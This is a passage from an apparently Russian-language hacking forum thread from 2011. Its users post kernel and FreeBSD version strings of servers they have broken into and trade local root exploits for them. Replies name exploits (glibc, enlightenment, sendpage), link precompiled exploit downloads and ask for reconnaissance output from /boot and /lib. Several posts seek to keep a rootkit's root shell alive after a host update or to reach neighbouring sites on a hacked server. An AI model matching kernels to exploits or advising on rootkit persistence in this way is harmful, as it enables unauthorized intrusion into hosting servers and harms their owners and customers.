они проапгрейдились уже до:
2.6.9-89.33.1.EL #1 Mon Nov 15 18:45:41 EST 2010 i686
что посоветуете, люди добрые?


Забить...это ядро не пробить.

vasykas
09.08.2011, 23:59
Всем привет!
Кто-нибудь таки подобрал что-нибудь под
Linux ******** 2.6.9-89.0.11.EL #1 Mon Aug 31 10:56:13 EDT 2009 i686 athlon i386 GNU/Linux
? очень-очень надо, ответа так и не нашел, перепробовал кучу тоже (


этот попробуй

http://turboupload.com/v3xtazklfijz

попугай
10.08.2011, 20:30
2.6.18-238.12.1.el5xen #1 SMP Tue May 31 14:02:29 EDT 2011


Если 2011, то значит все пропатчено и не повыситься?

FQziT
10.08.2011, 20:42
Если 2011, то значит все пропатчено и не повыситься?


Ну не факт что пропатчено.. просто время сборки ядра.

sevenup
10.08.2011, 20:51
Ну не факт что пропатчено.. просто время сборки ядра.


Учитывая что у него ядро, которое появилось в 2011 году...это значит что то что оно пропатчено это факт.

AC//DC
10.08.2011, 22:55
Linux ----- 2.6.26-2-686 #1 SMP Mon Jun 21 05:58:44 UTC 2010 i686

не берёт enlightenment

что посоветуете

vasykas
10.08.2011, 23:58
Linux ----- 2.6.26-2-686 #1 SMP Mon Jun 21 05:58:44 UTC 2010 i686
не берёт enlightenment
что посоветуете


http://ptresearch.blogspot.com/2011/04/fuzzing-and-exploitation-of.html

http://www.exploit-db.com/exploits/9575/

http://www.ziddu.com/download/15566135/bitchscan.tar.gz.html

harrd
11.08.2011, 05:53
Linux ******** 2.6.18-028stab060.2 #1 SMP Tue Jan 13 10:24:09 MSK 2009 i686 i686 i386 GNU/Linux

Linux ******** 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64 GNU/Linux

есть что-нибудь?

sevenup
11.08.2011, 11:47
Linux ----- 2.6.26-2-686 #1 SMP Mon Jun 21 05:58:44 UTC 2010 i686
не берёт enlightenment
что посоветуете


Glibc возьмёт 100%


Linux ******** 2.6.18-028stab060.2 #1 SMP Tue Jan 13 10:24:09 MSK 2009 i686 i686 i386 GNU/Linux
есть что-нибудь?


sendpage 3

oODungVTOo
11.08.2011, 17:21
Linux 2.6.9-101.ELsmp #1 SMP Fri May 27 18:57:30 EDT 2011 i686

help me, pls

Expl0ited
11.08.2011, 17:39
Linux 2.6.9-101.ELsmp #1 SMP Fri May 27 18:57:30 EDT 2011 i686
help me, pls


Не рутабельно

GroM88
11.08.2011, 19:40
Подскажите что нить под это?

Linux 2.6.14 #3 SMP Mon Jun 18 13:11:46 EDT 2007 i686 GNU/Linux

P.S. Если можно киньте сразу компиленный. На серваке траблы с компиляцией, error's летят...

sevenup
11.08.2011, 20:05
Подскажите что нить под это?
Linux 2.6.14 #3 SMP Mon Jun 18 13:11:46 EDT 2007 i686 GNU/Linux
P.S. Если можно киньте сразу компиленный. На серваке траблы с компиляцией, error's летят...


http://trav1an.t35.com/Localz/Localz-3

Expl0ited
11.08.2011, 22:40
Подскажите что нить под это?
Linux 2.6.14 #3 SMP Mon Jun 18 13:11:46 EDT 2007 i686 GNU/Linux
P.S. Если можно киньте сразу компиленный. На серваке траблы с компиляцией, error's летят...


Должен справится тот же glibc или enlightment, или если проблема с компиляцией, то можно попробывать:

http://th3-0utl4ws.com/localroot/

GroM88
12.08.2011, 14:31
Есть что под это чудо в паблике?))

Linux 2.6.36.2-grsec #1 SMP Thu Feb 17 04:24:57 EST 2011 x86_64

Woin
12.08.2011, 14:39
Подскажите, что есть для:

FreeBSD 8.2-RC3 FreeBSD 8.2-RC3 #0: Sun Jan 30 06:28:31 UTC 2011 amd64 ??

GroM88
12.08.2011, 17:42
FreeBSD 7.3-RELEASE FreeBSD 7.3-RELEASE #0: Sun Mar 21 06:15:01 UTC 2010

Под такую бредню, что можно попробовать?

Faaax
13.08.2011, 09:13
Linux 2.6.18-194.26.1.el5.028stab079.2 #1 SMP Fri Dec 17 19:25:15 MSK 2010 x86_64 x86_64 x86_64 GNU/Linux

FreeBSD www7.100mb.ru 6.2-RELEASE-p12 FreeBSD 6.2-RELEASE-p12 #0: Tue Nov 2 15:10:40 MSK 2010 root@www7.100mb.ru:/usr/obj/usr/src/sys/WWW7NEW i386

есть,что нить под них?

vasykas
13.08.2011, 13:33
Linux 2.6.18-194.26.1.el5.028stab079.2 #1 SMP Fri Dec 17 19:25:15 MSK 2010 x86_64 x86_64 x86_64 GNU/Linux
FreeBSD www7.100mb.ru 6.2-RELEASE-p12 FreeBSD 6.2-RELEASE-p12 #0: Tue Nov 2 15:10:40 MSK 2010 root@www7.100mb.ru:/usr/obj/usr/src/sys/WWW7NEW i386
есть,что нить под них?


порпобуй этот

http://turboupload.com/d3hh9t4eyig4

vasykas
13.08.2011, 13:37
FreeBSD 7.3-RELEASE FreeBSD 7.3-RELEASE #0: Sun Mar 21 06:15:01 UTC 2010
Под такую бредню, что можно попробовать?


этот не прокатит?

http://turboupload.com/5sk9lheojwsy

_Spamer_
13.08.2011, 14:29
snake Linux onweb.ru 2.6.30.10-105.2.23.fc11.i586 #1 SMP Thu Feb 11 06:51:26 UTC 2010 i686


---s--x--x 1 root root 63012 Mar 23 2010 /usr/bin/staprun
total 21556
drwxr-xr-x. 5 root root 4096 Feb 20 2010 .
drwxr-xr-x. 24 root root 4096 Feb 13 03:56 ..
-rw-r--r--. 1 root root 1093951 Dec 10 2009 System.map-2.6.27.41-170.2.117.fc10.i586
-rw-r--r--. 1 root root 1089995 Dec 16 2008 System.map-2.6.27.9-159.fc10.i586
-rw-r--r--. 1 root root 1363935 Feb 11 2010 System.map-2.6.30.10-105.2.23.fc11.i586
-rw-r--r--. 1 root root 90704 Dec 10 2009 config-2.6.27.41-170.2.117.fc10.i586
-rw-r--r--. 1 root root 90902 Dec 16 2008 config-2.6.27.9-159.fc10.i586
-rw-r--r--. 1 root root 100564 Feb 11 2010 config-2.6.30.10-105.2.23.fc11.i586
drwxr-xr-x. 3 root root 4096 Jan 8 2009 efi
drwxr-xr-x. 2 root root 4096 Feb 20 2010 grub
-rw-------. 1 root root 1384473 Jan 11 2007 initrd-2.6.18-1.2798.fc6.img.old
-rw-------. 1 root root 2806096 Feb 20 2010 initrd-2.6.27.41-170.2.117.fc10.i586.img
-rw-------. 1 root root 2814217 Jan 8 2009 initrd-2.6.27.9-159.fc10.i586.img
-rw-------. 1 root root 2691924 Feb 20 2010 initrd-2.6.30.10-105.2.23.fc11.i586.img
drwx------. 2 root root 16384 Nov 10 2006 lost+found
-rwxr-xr-x. 1 root root 2579792 Dec 10 2009 vmlinuz-2.6.27.41-170.2.117.fc10.i586
-rwxr-xr-x. 1 root root 2571120 Dec 16 2008 vmlinuz-2.6.27.9-159.fc10.i586
-rwxr-xr-x. 1 root root 3200368 Feb 11 2010 vmlinuz-2.6.30.10-105.2.23.fc11.i586
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 246G 9.3G 224G 4% /
/dev/sda1 989M 38M 901M 5% /boot
/dev/sda2 337G 206G 114G 65% /home
tmpfs 1.5G 0 1.5G 0% /dev/shm
Welcome to A+ Hosting's A+ Linux
lrwxrwxrwx. 1 root root 16 Feb 20 2010 /lib/libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x. 1 root root 193064 Feb 26 2009 /lib/libpcre.so.0.0.1


Есть что-то?

sevenup
13.08.2011, 17:53
snake
Linux onweb.ru 2.6.30.10-105.2.23.fc11.i586 #1 SMP Thu Feb 11 06:51:26 UTC 2010 i686
Есть что-то?


Glibc

vasykas
13.08.2011, 22:24
Linux xxxxxxxxx 2.6.32.21 #2 SMP Mon Aug 30 11:50:41 EDT 2010 i686

кто что может подсказать

спасибо

sevenup
13.08.2011, 22:28
Linux xxxxxxxxx 2.6.32.21 #2 SMP Mon Aug 30 11:50:41 EDT 2010 i686
кто что может подсказать
спасибо


/showpost.php?p=2789862&postcount=467

vasykas
13.08.2011, 22:40
/showpost.php?p=2789862&postcount=467


glibs,enlightenment не берет

sevenup
13.08.2011, 23:26
glibs,enlightenment не берет


У Glibc не только libprofile, позволяет получить рута...поищи другие либы

Unknown
13.08.2011, 23:51
Linux 2.6.24.2 #1 SMP Wed Feb 13 18:55:52 MSK 2008 i686

winstrool
14.08.2011, 01:39
FreeBSD 7.3-STABLE FreeBSD 7.3-STABLE #1: Sat May 1 08:27:38 EEST 2010


может кто дать скомпелированый сплоит под это?

на серваке компиляторов нет

vasykas
14.08.2011, 21:35
есть вопросик.

как можно сохранить рут-шелл (руткит)

после апдейта хоста хостером

и возможно ли?

sevenup
14.08.2011, 22:28
есть вопросик.
как можно сохранить рут-шелл (руткит)
после апдейта хоста хостером
и возможно ли?


ну рут шелл чаще всего используют через суидник...а он никуда не исчезает после апгрейта ядра...

vasykas
14.08.2011, 22:42
ну рут шелл чаще всего используют через суидник...а он никуда не исчезает после апгрейта ядра...


дело вот в чем:

сервак был 2009 года

поставил руткит, заходил через putty без проблем

сегодня смотрю апдейт 2010 и не могу при конектится

в хакере читал что после установки руткита

и чтобы сохранить рута после апдейта

надо куда то и что то прописать (до апдейта)

не помню что и в google найти не могу,и где читал не найду

может кто сталкивался с этим?

brain
15.08.2011, 02:30
Дабы не создавать отдельную тему, спрошу тут.

Есть доступ к админке сайта и морде.

У этого сайта на субдомене лежит еще один сайтик. Возможно ли как то подойти к нему, имея полный доступ на основном домене?

eclipse
16.08.2011, 22:43
Есть что-нить для:


Линукс 2.6.16.60-0.42.9-smp
и
2.6.18-338.9.1.el5.lve0.8.32 #1 SMP Thu Apr 28 EEST 2011 x86_64


?

sevenup
16.08.2011, 23:10
Есть что-нить для:
?


Показывай полный вывод команды:

uname -a

Под второй нету.

eclipse
16.08.2011, 23:17
severup, вот


Linux web7 2.6.16.60-0.42.9-smp #1 SMP Thu Jan 28 23:39:37 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux

sevenup
16.08.2011, 23:27
severup, вот


покажи вывод команды:

ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;

eclipse
17.08.2011, 10:47
покажи вывод команды:
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;


Вот оно:


ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
total 15942
138 drwxr-xr-x 3 root root 984 Apr 23 04:27 .
2 drwxr-xr-x 25 root root 632 Jul 31 11:26 ..
38169 -rw-r--r-- 1 root root 942070 May 6 2008 System.map-2.6.16.60-0.21-smp
277836 -rw-r--r-- 1 root root 945260 Jan 29 2010 System.map-2.6.16.60-0.42.9-smp
45144 -rw------- 1 root root 512 Oct 23 2009 backup_mbr
29742 lrwxrwxrwx 1 root root 1 Oct 23 2009 boot -> .
38170 -rw-r--r-- 1 root root 60952 May 6 2008 config-2.6.16.60-0.21-smp
277837 -rw-r--r-- 1 root root 60952 Jan 29 2010 config-2.6.16.60-0.42.9-smp
29743 drwxr-xr-x 2 root root 512 Feb 12 2010 grub
39958 lrwxrwxrwx 1 root root 27 Apr 23 04:27 initrd -> initrd-2.6.16.60-0.42.9-smp
45308 -rw-r--r-- 1 root root 3219653 Apr 23 04:27 initrd-2.6.16.60-0.21-smp
279641 -rw-r--r-- 1 root root 3231483 Apr 23 04:27 initrd-2.6.16.60-0.42.9-smp
45150 -rw-r--r-- 1 root root 135680 Oct 23 2009 message
38171 -rw-r--r-- 1 root root 119081 May 6 2008 symsets-2.6.16.60-0.21-smp.tar.gz
277844 -rw-r--r-- 1 root root 151642 Jan 29 2010 symsets-2.6.16.60-0.42.9-smp.tar.gz
38172 -rw-r--r-- 1 root root 338695 May 6 2008 symtypes-2.6.16.60-0.21-smp.gz
277845 -rw-r--r-- 1 root root 339079 Jan 29 2010 symtypes-2.6.16.60-0.42.9-smp.gz
38173 -rw-r--r-- 1 root root 93706 May 6 2008 symvers-2.6.16.60-0.21-smp.gz
277846 -rw-r--r-- 1 root root 93864 Jan 29 2010 symvers-2.6.16.60-0.42.9-smp.gz
38174 -rwxr-xr-x 1 root root 1784053 May 6 2008 vmlinux-2.6.16.60-0.21-smp.gz
277847 -rwxr-xr-x 1 root root 1789242 Jan 29 2010 vmlinux-2.6.16.60-0.42.9-smp.gz
39957 lrwxrwxrwx 1 root root 28 Feb 12 2010 vmlinuz -> vmlinuz-2.6.16.60-0.42.9-smp
38175 -rw-r--r-- 1 root root 1484672 May 6 2008 vmlinuz-2.6.16.60-0.21-smp
277848 -rw-r--r-- 1 root root 1488716 Jan 29 2010 vmlinuz-2.6.16.60-0.42.9-smp
14454 -rwxr-xr-x 1 root root 7497 Apr 22 2008 /lib/libpcprofile.so
14422 -rwxr-xr-x 1 root root 129557 Apr 22 2008 /lib/ld-2.4.so
14423 lrwxrwxrwx 1 root root 9 Oct 23 2009 /lib/ld-linux.so.2 -> ld-2.4.so

sevenup
17.08.2011, 11:00
Вот оно:


вот это пробьёт:


http://www.multiupload.com/APXX9GISX2

eclipse
18.08.2011, 13:01
Linux ser.com 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 x86_64
FreeBSD vp..net 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #0: Sun Oct 24 05:07:31 MSD 2010 root@vp.ne
Linux 2.6.18-338.9.1.el5[blablabla]ve0.8.32 #1 SMP Thu Apr 28 19:51:11 EEST 2011 x86_64


Есть что посоветовать?) Цветные в приоритете!)) Буду очень благодарен!

vasykas
18.08.2011, 20:29
Есть что посоветовать?) Цветные в приоритете!)) Буду очень благодарен!


bsd попробуй эти

http://turboupload.com/56p3z11qi15f

sevenup
18.08.2011, 22:37
Есть что посоветовать?) Цветные в приоритете!)) Буду очень благодарен!


на FreeBSD:

http://www.1337day.com/exploits/14374

А остальные без вариантов.

z0mbyak
18.08.2011, 22:50
Да и bsd не факт, так как судя по дате Sun Oct 24 05:07:31 MSD 2010 дыры там нету... Про линукс вообще молчу, апрель и июль этого года, мне кажется, что даже в привате под них ничего нет...

vasykas
18.08.2011, 22:55
Да и bsd не факт, так как судя по дате Sun Oct 24 05:07:31 MSD 2010 дыры там нету... Про линукс вообще молчу, апрель и июль этого года, мне кажется, что даже в привате под них ничего нет...


http://www.youtube.com/watch?v=H57LIcRqxlo

vasykas
18.08.2011, 23:00
Есть что посоветовать?) Цветные в приоритете!)) Буду очень благодарен!


вот еще нашел

https://rdot.org/forum/showthread.php?t=601&page=2

z0mbyak
18.08.2011, 23:00
А то что ядро июньское в видео это ничего?

eclipse
20.08.2011, 00:59
Спасибо за отзывчивость Но к сожалению все еще ничего не сработало

Может быть с этим что нить смогу сделать?


Linux se 2.6.18-164.9.1.el5 #1 SMP Tue Dec 15 20:57:57 EST 2009 x86_64


вроде бы уже староватый))

вот эти


http://1337day.com/exploits/14333
enlightenment
sendpage


попробовал.. не сработали

Kuteke
20.08.2011, 12:36
Linux ****.*****.ru 2.6.32.1 #6 SMP Wed Nov 24 03:02:29 MSK 2010 x86_64

Не сработал Linux 2.6.32 local root exploit(вроде сделал все правильно)


407210 -rw-r--r-- 1 c3602 c3602 6136 Jun 8 2008 /lib/libpcprofile.so
407214 -rwxr-xr-x 1 root root 97928 Jun 8 2008 /lib/ld-2.3.6.so
407231 lrwxrwxrwx 1 c3602 c3602 11 Oct 9 2008 /lib/ld-linux-x86-64.so.2 -> ld-2.3.6.so
407202 lrwxrwxrwx 1 c3602 c3602 34 Oct 9 2008 /lib/ld-linux.so.2 -> /emul/ia32-linux/lib/ld-linux.so.2
407549 lrwxrwxrwx 1 root root 25 Sep 27 2007 /lib/ld-lsb-x86-64.so.3 -> /lib/ld-linux-x86-64.so.2


------------------------------------------------------------------------------

Linux *********** 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64


итого 18534
2 drwxr-xr-x 4 root root 3072 Авг 2 04:33 .
2 drwxr-xr-x 22 root root 4096 Май 11 15:58 ..
26 lrwxrwxrwx 1 root root 1 Янв 10 2011 boot -> .
16 -rw-r--r-- 1 root root 66892 Сен 29 2010 config-2.6.18-194.17.1.el5
29 -rw-r--r-- 1 root root 66892 Янв 6 2011 config-2.6.18-194.32.1.el5
34 -rw-r--r-- 1 root root 67215

sevenup
20.08.2011, 15:11
Linux ****.*****.ru 2.6.32.1 #6 SMP Wed Nov 24 03:02:29 MSK 2010 x86_64
Не сработал Linux 2.6.32 local root exploit(вроде сделал все правильно)

407210 -rw-r--r-- 1 c3602 c3602 6136 Jun 8 2008 /lib/libpcprofile.so
407214 -rwxr-xr-x 1 root root 97928 Jun 8 2008 /lib/ld-2.3.6.so
407231 lrwxrwxrwx 1 c3602 c3602 11 Oct 9 2008 /lib/ld-linux-x86-64.so.2 -> ld-2.3.6.so
407202 lrwxrwxrwx 1 c3602 c3602 34 Oct 9 2008 /lib/ld-linux.so.2 -> /emul/ia32-linux/lib/ld-linux.so.2
407549 lrwxrwxrwx 1 root root 25 Sep 27 2007 /lib/ld-lsb-x86-64.so.3 -> /lib/ld-linux-x86-64.so.2



Glibc возьмёт 100%

По второму - без вариантов.

Kuteke
21.08.2011, 11:59
sevenup,

не помог. Пишет, что директория /tmp/exploit уже есть, то пишет, что папка /tmp/exploit не существует...

sevenup
21.08.2011, 15:05
sevenup,
не помог. Пишет, что директория /tmp/exploit уже есть, то пишет, что папка /tmp/exploit не существует...


вот:

http://www.multiupload.com/M7GKBI3NLB

попробуй это...

P.S. не забудь файлу дать права 777 прежде чем выполнять его...

Kuteke
21.08.2011, 17:58
Значит пропатчено...

FreeBSD *** 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sun Feb 14 18:35:02 EET 2010 root@***:/usr/src/sys/amd64/compile/hosting amd64

Exploit от 2009 года для FreeBSD 8.0-RELEASE не взял...


total 750
141312 drwxr-xr-x 9 root wheel 1024 29 дек 2010 .
2 drwxr-xr-x 22 root wheel 1024 3 июн 22:34 ..
141334 -r--r--r-- 1 root wheel 7647 21 ноя 2009 beastie.4th
141322 -r--r--r-- 1 root wheel 8192 21 ноя 2009 boot
141320 -r--r--r-- 1 root wheel 512 21 ноя 2009 boot0
141321 -r--r--r-- 1 root wheel 512 21 ноя 2009 boot0sio
141323 -r--r--r-- 1 root wheel 512 21 ноя 2009 boot1
141324 -r--r--r-- 1 root wheel 7680 21 ноя 2009 boot2
141325 -r--r--r-- 1 root wheel 1201 21 ноя 2009 cdboot
141313 drwxr-xr-x 2 root wheel 512 21 ноя 2009 defaults
141338 -r--r--r-- 1 root wheel 703 21 ноя 2009 device.hints
141314 drwxr-xr-x 2 root wheel 512 21 ноя 2009 firmware
141333 -r--r--r-- 1 root wheel 2262 21 ноя 2009 frames.4th
141326 -r--r--r-- 1 root wheel 7535 21 ноя 2009 gptboot
141328 -r--r--r-- 1 root wheel 25219 21 ноя 2009 gptzfsboot
188418 drwxr-xr-x 2 root wheel 11776 14 фев 2010 kernel
141340 drwxr-xr-x 2 root wheel 28160 21 ноя 2009 kernel.old
165245 drwxr-xr-x 2 root wheel 11776 29 дек 2010 kernel.old1
141336 -r-xr-xr-x 1 root wheel 233472 21 ноя 2009 loader
141330 -r--r--r-- 1 root wheel 5865 21 ноя 2009 loader.4th
142456 -rw-r--r-- 1 root wheel 22 14 фев 2010 loader.conf
141329 -r--r--r-- 1 root wheel 15219 21 ноя 2009 loader.help
141335 -r--r--r-- 1 root wheel 396 21 ноя 2009 loader.rc
141318 -r--r--r-- 1 root wheel 512 21 ноя 2009 mbr
141316 drwxr-xr-x 2 root wheel 512 21 ноя 2009 modules
141319 -r--r--r-- 1 root wheel 512 21 ноя 2009 pmbr
141337 -r--r--r-- 1 root wheel 235520 21 ноя 2009 pxeboot
141332 -r--r--r-- 1 root wheel 703 21 ноя 2009 screen.4th
141331 -r--r--r-- 1 root wheel 35136 21 ноя 2009 support.4th
141317 drwxr-xr-x 2 root wheel 512 21 ноя 2009 zfs
141327 -r--r--r-- 1 root wheel 33280 21 ноя 2009 zfsboot
518175 -r--r--r-- 1 root wheel 196768 21 ноя 2009 /lib/libpcap.so.7
ls: /lib/ld*: No such file or directory

vasykas
21.08.2011, 19:35
есть что нибудь

Linux icpu1521 2.6.28.8-20101130b-iscsi-ntacker-fasync-mremap-amd-sec6-grsec #1 SMP Tue Nov 30 18:27:29 CET 2010 i686 GNU/Linux

или

Linux ********** 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

XAMEHA
22.08.2011, 09:35
есть что нибудь
Linux icpu1521 2.6.28.8-20101130b-iscsi-ntacker-fasync-mremap-amd-sec6-grsec #1 SMP Tue Nov 30 18:27:29 CET 2010 i686 GNU/Linux
или
Linux ********** 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux


/thread229985.html

http://www.webhostingtalk.com/showthread.php?t=670497

http://www.hackforums.net/showthread.php?tid=658410

Expl0ited
22.08.2011, 10:36
Linux ********** 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux


Хоть и ноябрь, но попробывать стоит: http://sota.gen.nz/compat2/robert_you_suck.c

http://seclists.org/fulldisclosure/2010/Sep/268

Bramin
22.08.2011, 14:46
будьте добры, для этого есть что-нибудь?

Linux xxxxx 2.6.18-028stab070.5 #1 SMP Fri Sep 17 15:37:23 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux